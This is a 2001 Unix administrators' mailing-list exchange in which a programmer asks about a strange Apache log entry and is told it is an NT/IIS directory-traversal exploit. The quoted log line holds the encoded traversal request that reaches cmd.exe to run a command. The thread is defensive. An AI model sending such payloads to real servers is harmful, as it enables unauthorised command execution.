The consensus is that yes, this is an exploit, but aimed at
NT/IIS exploit for gaining directory acesss, if not more.
Thanks
George
yes ...
http://www.securityfocus.com/bid/1806
>-----Original Message-----
>From: George Gallen [mailto:ggallen_at_slackinc.com]
>Sent: Tuesday, June 19, 2001 10:58 AM
>To: 'tru64-unix-managers_at_ornl.gov'
>Subject: Is this an exploit of any kind?
>
>
>In my apache access logs I have the following:
>
>x.x.x.x - - [16/Jun/2001:14:45:24 -0400] "GET
>/scripts/..%c0%af..%c0%af..%
>c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cm
>d.exe?/c%20di
>r HT
>TP/1.0" 401 472
>
>Since we are not an NT, I doubt it would have done anything, but just
>curious what
>is it's function? (Is that imbedded Java script?)
>
>Thanks
>George
>
>George Gallen
>Senior Programmer/Analyst
>Accounting/Data Division
>ggallen_at_slackinc.com
>ph:856.848.1000 Ext 220
>
>SLACK Incorporated - An innovative information, education and
>management
>company
>http://www.slackinc.com
>
Received on Tue Jun 19 2001 - 15:37:28 NZST